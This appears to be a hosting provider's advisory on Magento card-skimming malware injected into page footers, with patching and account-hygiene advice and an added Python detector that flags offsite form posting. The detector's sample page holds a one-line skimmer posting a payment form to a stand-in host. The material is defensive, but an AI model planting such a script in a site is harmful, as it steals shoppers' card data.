Multiple versions have been found in the wild, but they all work the same way: the malware is embedded in the header or footer of every page. Once an unsuspecting shopper submits a form that contains anything resembling a credit card number, the whole form is transparently copied, using AJAX, to a remote location.
Magento itself says that the attacks are likely using Admin or database access to implement the exploit, and that most impacted sites either have not applied the February 2015 Shoplift patch (SUPEE-5344) or applied it after the site was already compromised. Attackers can also gain Admin access through weak passwords, phishing, and other unpatched vulnerabilities.
No Magento sites hosted by Havenswift Hosting are compromised by this issue, but all store owners should always apply all patches available on the Community Edition Download Page as soon as feasible after their release; regularly check for any unknown files in the system; review and remove all unknown Admin accounts; and ensure all Admin accounts have very strong passwords (e.g., they should be long and include symbols, upper and lower case letters, and numbers – we very strongly recommend using a password manager like the excellent LastPass).
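
A defender's check for the behaviour described above, as an added example that is not part of the original post: it parses a rendered storefront page and flags scripts loaded from hosts outside an allowlist, plus inline scripts that both read form contents and send data to such a host. The host names, the sample page and the heuristic pattern lists are constructed assumptions.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Heuristic patterns (assumptions): calls that send data, and calls that read form contents.
SEND = re.compile(r"XMLHttpRequest|Ajax\.Request|\$\.(?:ajax|post)|jQuery\.(?:ajax|post)|fetch\(|sendBeacon")
READ = re.compile(r"serialize\(|FormData|\.value\b|\.elements\b")
URL = re.compile(r"""["'](?:https?:)?//([^/"'\s:]+)""")

class ScriptCollector(HTMLParser):
    """Collects [src, inline_body] for every <script> element on the page."""
    def __init__(self):
        super().__init__()
        self.scripts, self._open = [], False
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.scripts.append([dict(attrs).get("src"), ""])
            self._open = True
    def handle_endtag(self, tag):
        if tag == "script":
            self._open = False
    def handle_data(self, data):
        if self._open:
            self.scripts[-1][1] += data

def audit_page(html, allowed_hosts):
    """Return (kind, host) findings for scripts that load from or post to unknown hosts."""
    allowed = {h.lower() for h in allowed_hosts}
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for src, body in parser.scripts:
        host = (urlparse(src).hostname or "").lower() if src else ""
        if host and host not in allowed:
            findings.append(("external-script", host))
        # Inline code is suspicious only if it reads a form AND sends to a host we do not know.
        hosts = {h.lower() for h in URL.findall(body)} - allowed
        if hosts and SEND.search(body) and READ.search(body):
            findings.extend(("form-data-sent-offsite", h) for h in sorted(hosts))
    return findings

# Constructed sample page (hypothetical hosts): one legitimate script, one injected footer script.
SAMPLE = """<html><head><script src="https://shop.example/js/prototype.js"></script></head>
<body><form id="payment"><input name="cc_number"></form>
<script>jQuery.post("https://stats-collector.example/g", jQuery("#payment").serialize());</script>
</body></html>"""

if __name__ == "__main__":
    for kind, host in audit_page(SAMPLE, {"shop.example"}):
        print(kind, host)
```

Run it against the rendered HTML of several page types (home, cart, checkout) with every host the store legitimately uses in the allowlist; a finding is a prompt to inspect that script, not proof of compromise.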